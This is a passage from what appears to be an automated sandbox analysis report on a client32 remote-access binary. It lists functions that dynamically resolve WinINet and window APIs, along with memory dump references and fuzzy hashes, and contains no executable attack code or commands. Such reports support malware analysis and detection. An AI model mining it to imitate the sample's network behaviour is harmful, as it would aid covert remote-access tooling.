                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$ErrorLastctl_pittmanfunc
                                                                                                • String ID: P
                                                                                                • API String ID: 2926529296-3110715001
                                                                                                • Opcode ID: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
                                                                                                • Instruction ID: 17a8b8e94c5914059f120dd0283c54c417ecae3921ca0632c4dbd14c4ec9589c
                                                                                                • Opcode Fuzzy Hash: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
                                                                                                • Instruction Fuzzy Hash: 63F0B2B5A4060CABDF14CFD4DC81F9E77B9AB48704F104119FA18AB3C4D7B0A5518B65
                                                                                                Function 69CE4BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 69CE4BF4
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4C1D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetReadFile
                                                                                                • API String ID: 199729137-1824561397
                                                                                                • Opcode ID: ea1e219148cc211cc9a662f1cda85b3890a885fc5d5323ff3b78dc1da70f89c5
                                                                                                • Instruction ID: 3cea7f3440aad629c2b9628aebb40ebef9f4b9e91c1f5a8b2535819efadf88a8
                                                                                                • Opcode Fuzzy Hash: ea1e219148cc211cc9a662f1cda85b3890a885fc5d5323ff3b78dc1da70f89c5
                                                                                                • Instruction Fuzzy Hash: C7F08272600618AFD710CF94DA44F9773B8FB48760F00842AFA46D7640D6B0F810CFA0
                                                                                                Function 69CE4B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA,000000C8,?,69CEB53C,00000000,0000002B,?,?), ref: 69CE4BA4
                                                                                                • SetLastError.KERNEL32(00000078,000000C8,?,69CEB53C,00000000,0000002B,?,?), ref: 69CE4BCD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetQueryOptionA
                                                                                                • API String ID: 199729137-3310327128
                                                                                                • Opcode ID: c1819eba704cc6ff77064ce49c4ddb372c528effc5aca93ff79be51db86c092b
                                                                                                • Instruction ID: 393aac6397dc8e75a4222df657bd08a995c348c4739b9d392d2950b565d98481
                                                                                                • Opcode Fuzzy Hash: c1819eba704cc6ff77064ce49c4ddb372c528effc5aca93ff79be51db86c092b
                                                                                                • Instruction Fuzzy Hash: 2EF08C76614658AFD750CF94EA84F9B73A8FB48761F40882AFA46D7A40D670F850CBA0
                                                                                                Function 69CE4B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 69CE4B54
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4B7D
                                                                                                Strings
                                                                                                • InternetQueryDataAvailable, xrefs: 69CE4B4E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetQueryDataAvailable
                                                                                                • API String ID: 199729137-452555236
                                                                                                • Opcode ID: 8f0987314f36b7ed00921974ec0009b66947604b61250f1e2da53fd069b99e29
                                                                                                • Instruction ID: 844dcaf521e2742a47f07e8924a8e501cdd7fc0aad6387e50f2c39dc6eb35197
                                                                                                • Opcode Fuzzy Hash: 8f0987314f36b7ed00921974ec0009b66947604b61250f1e2da53fd069b99e29
                                                                                                • Instruction Fuzzy Hash: 03F0BE72601618AFD710CF94EA44F5773A8FB48750F00842AF94683640C670F800CBA0
                                                                                                Function 69CE4DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetWriteFile,?,?,69CE9BCE,?,?,?,?), ref: 69CE4DE4
                                                                                                • SetLastError.KERNEL32(00000078,?,?,69CE9BCE,?,?,?,?), ref: 69CE4E0D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetWriteFile
                                                                                                • API String ID: 199729137-2273844942
                                                                                                • Opcode ID: ec31e9f9444914a63e991480e197b224df84968f37ec398736d3b2805ce8f5c2
                                                                                                • Instruction ID: 4555e695442a63872493e3b3be4deac4f24324d2900cc5b02d79ecec00ab4e96
                                                                                                • Opcode Fuzzy Hash: ec31e9f9444914a63e991480e197b224df84968f37ec398736d3b2805ce8f5c2
                                                                                                • Instruction Fuzzy Hash: CDF08272A10228AFD720CF95D904F5773A8FB48761F00852AFA46D7640D671E810CFA0
                                                                                                Function 69CE4D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetSetOptionA,00000000,?,69CEB392,00000000,0000002B,?,?), ref: 69CE4D44
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB392,00000000,0000002B,?,?), ref: 69CE4D6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetSetOptionA
                                                                                                • API String ID: 199729137-1247460590
                                                                                                • Opcode ID: 60167e8d4104d2d7cc40486a1593afff5ca150394ca596fcabe5114e222b7c70
                                                                                                • Instruction ID: d573c6e7754132e24a9fae76191b96ad1f6871fdccab512ad912781f390593fb
                                                                                                • Opcode Fuzzy Hash: 60167e8d4104d2d7cc40486a1593afff5ca150394ca596fcabe5114e222b7c70
                                                                                                • Instruction Fuzzy Hash: 93F01276A04628AFE720DF94D944F5777A8EB48B61F00442AFA5AD7640D671E810CBA0
                                                                                                Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                • API String ID: 1134434899-3115850912
                                                                                                • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                • m_hWnd, xrefs: 110151F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: QueueUserWorkItem
                                                                                                • API String ID: 199729137-2469634949
                                                                                                • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                Function 69CE4D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback,02EF2D2C,?,69CEB267,00000000,69CE6BD0), ref: 69CE4D94
                                                                                                • SetLastError.KERNEL32(00000078,02EF2D2C,?,69CEB267,00000000,69CE6BD0), ref: 69CE4DB5
                                                                                                Strings
                                                                                                • InternetSetStatusCallback, xrefs: 69CE4D8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetSetStatusCallback
                                                                                                • API String ID: 199729137-894424467
                                                                                                • Opcode ID: 101f9b17951dbe0a5912fa923df1c030403ff046db57c5b22992f07934b20001
                                                                                                • Instruction ID: d2d8f926d5f26d4bc3461f1b4ff9b599c25c52b69073cc9961906ee00340cbb3
                                                                                                • Opcode Fuzzy Hash: 101f9b17951dbe0a5912fa923df1c030403ff046db57c5b22992f07934b20001
                                                                                                • Instruction Fuzzy Hash: 31E065729447246FE7209F98D948F56B7B8FB44761F00842AEA45D7600D671E844DBD0
                                                                                                Function 69D180A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameName::
                                                                                                • String ID: {flat}
                                                                                                • API String ID: 1333004437-2606204563
                                                                                                • Opcode ID: 2fa21fe01e1db8db7f1dca36ea764a104a4f3154e86d7d3a712d910af6e6bd06
                                                                                                • Instruction ID: 403841f077dc9c132986b6080a6d94970cd9e5a369f9bf6dc416116395e01825
                                                                                                • Opcode Fuzzy Hash: 2fa21fe01e1db8db7f1dca36ea764a104a4f3154e86d7d3a712d910af6e6bd06
                                                                                                • Instruction Fuzzy Hash: A3F06536188248DFDB01CF58E554FA53BA5AB4275AF04C0A1E64C0F662C732D482C7A1
                                                                                                Function 69CFDC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CFDC59
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _memset.LIBCMT ref: 69CFDC82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc_memset
                                                                                                • String ID: Refcount.cpp
                                                                                                • API String ID: 2365696598-3480236496
                                                                                                • Opcode ID: c43326d0b8202ac3a7b5ae9413673bfbe213edf8bd9c45c4659f89d3b6585c4d
                                                                                                • Instruction ID: a4728c51bcc36c5f2d3b4f2d77366d4c0f0257278cffa850d4b29bdd9552be87
                                                                                                • Opcode Fuzzy Hash: c43326d0b8202ac3a7b5ae9413673bfbe213edf8bd9c45c4659f89d3b6585c4d
                                                                                                • Instruction Fuzzy Hash: 03E0C26BA4012437C21152963D03F8FFA5C4F92EADF050032FF0CA6641F795A95541E6
                                                                                                Function 69CE4C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,00000000,?,69CEB677,?), ref: 69CE4C44
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB677,?), ref: 69CE4C61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetCloseHandle
                                                                                                • API String ID: 199729137-3843628324
                                                                                                • Opcode ID: cd7f814751ae90c8858e1e7fb9bbc859e327a47a8abefc644d170de6364ed5df
                                                                                                • Instruction ID: 7732d8336e96980fca92b5ca27887fe7f419ad84a3d59075acb5a2ea9f4b4313
                                                                                                • Opcode Fuzzy Hash: cd7f814751ae90c8858e1e7fb9bbc859e327a47a8abefc644d170de6364ed5df
                                                                                                • Instruction Fuzzy Hash: FCE0D8729007249FD320DFA4D904F46B7F8EF24765F00453AE645D7501D670E484CBD0
                                                                                                Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
